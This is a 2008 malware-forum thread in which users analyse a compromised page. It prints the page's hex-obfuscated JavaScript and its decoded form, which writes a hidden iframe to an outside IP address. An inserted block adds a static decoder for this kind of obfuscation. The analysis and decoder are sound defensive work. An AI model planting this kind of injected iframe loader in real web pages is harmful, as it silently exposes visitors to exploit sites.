Malware Domain List

Malware Related => Malicious Domains => Topic started by: cconniejean on May 05, 2008, 01:56:09 am

Title: perso.orange.fr
Post by: cconniejean on May 05, 2008, 01:56:09 am
Code: [Select]
hxxp://perso.orange.fr/lightningbolttraffic/sites/
When I check the advertiser link posted above, my browser window shuts down. I'm seeing code in a script tag. LinkScannerPro says the above URL has a link to a known exploit site. When trying to copy and paste it at our forum, we got a virus alert for virus js/psyme.qm and warnings about it somehow interfering with the MySQL on the forum.
Title: Re: perso.orange.fr
Post by: Edgar Bangkok on May 05, 2008, 06:55:39 am
The site has obfuscated JavaScript:
Code: [Select]
<script>function v481b6eb925459(v481b6eb925d85){ var v481b6eb926451=16; return(parseInt(v481b6eb925d85,v481b6eb926451));}function v481b6eb926c47(v481b6eb92703e){ function v481b6eb927c33 () {var v481b6eb92802f=2; return v481b6eb92802f;} var v481b6eb92743a='';for(v481b6eb927836=0; v481b6eb927836<v481b6eb92703e.length; v481b6eb927836+=v481b6eb927c33()){ v481b6eb92743a+=(String.fromCharCode(v481b6eb925459(v481b6eb92703e.substr(v481b6eb927836, v481b6eb927c33()))));}return v481b6eb92743a;} document.write(v481b6eb926c47('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6336323561306634207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323339363734292B273430363830313439636538385C272077696474683D343039206865696768743D353836207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<CENTER>

After deobfuscating, we have another script:

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=c625a0f4 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*239674)+'40680149ce88\' width=409 height=586 style=\'display: none\'></iframe>')</SCRIPT>
It points to a Russian site, but if I load this page link directly I receive only:

Code: [Select]
Forbidden

You don't have permission to access /.if/go.html on this server.


Maybe the site needs to be called at
Code: [Select]
src=\'http://77.221.133.150/.if/go.html
with a different referer or from another page.

Edgar   ;D
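
Added example, not part of the original posts: a static way to unpack this kind of hex-pair `document.write` obfuscation and list the iframes it injects, without running the script in a browser. The sample input, the `malicious.example` host and all function names are constructed for illustration.

```javascript
// Static decoder for hex-pair obfuscation: the page source is handled as text,
// nothing is eval()'d or written to a DOM.

// Decode two-digit hex pairs (the sample's parseInt(pair, 16) + fromCharCode loop).
function decodeHexPairs(hex) {
  if (hex.length % 2 !== 0 || !/^[0-9a-fA-F]+$/.test(hex)) return null;
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Collect and decode quoted hex literals of at least minLen characters.
function extractHexPayloads(source, minLen = 40) {
  const payloads = [];
  for (const m of source.matchAll(/(['"])([0-9a-fA-F]+)\1/g)) {
    if (m[2].length < minLen) continue;
    const decoded = decodeHexPairs(m[2]);
    if (decoded !== null) payloads.push(decoded);
  }
  return payloads;
}

// List iframe tags in decoded text with their src and whether they are hidden.
function findIframes(text) {
  return [...text.matchAll(/<iframe\b[^>]*>/gi)].map(([tag]) => {
    // src may be wrapped in escaped quotes (\') inside a document.write string
    const src = /src\s*=\s*\\?['"]?([^'"\\\s>]+)/i.exec(tag);
    const hidden = /display\s*:\s*none/i.test(tag) ||
      /\b(width|height)\s*=\s*\\?['"]?[01]\b/i.test(tag);
    return { src: src ? src[1] : null, hidden };
  });
}

function analyze(source) {
  return extractHexPayloads(source).flatMap(findIframes);
}

// Constructed sample (not the forum's data): same shape as the posted script,
// with a reserved .example host in place of the real one.
const toHex = (s) => [...s].map((c) => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const INNER = String.raw`<SCRIPT>document.write('<iframe name=a1 src=\'http://malicious.example/.if/go.html?'+Math.round(Math.random()*1000)+'abc\' width=409 height=586 style=\'display: none\'></iframe>')</SCRIPT>`;
const SAMPLE_PAGE = `<script>function d(h){/* decoder body elided */} document.write(d('${toHex(INNER)}'));</script>`;

console.log(analyze(SAMPLE_PAGE));
```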
Title: Re: perso.orange.fr
Post by: cconniejean on May 05, 2008, 10:08:38 pm
Thank you Edgar. I just checked out your blog, nice.
Title: Re: perso.orange.fr
Post by: Edgar Bangkok on May 06, 2008, 03:27:36 am
Today the Russian site is working OK and I find a hidden iframe with other JavaScript in the page if.go

I think it is the same as described on the BitDefender site at

http://www.bitdefender.com/VIRUS-1000262-en--Trojan.Clicker.HTML.IFrame.AR.html

Edgar  ;D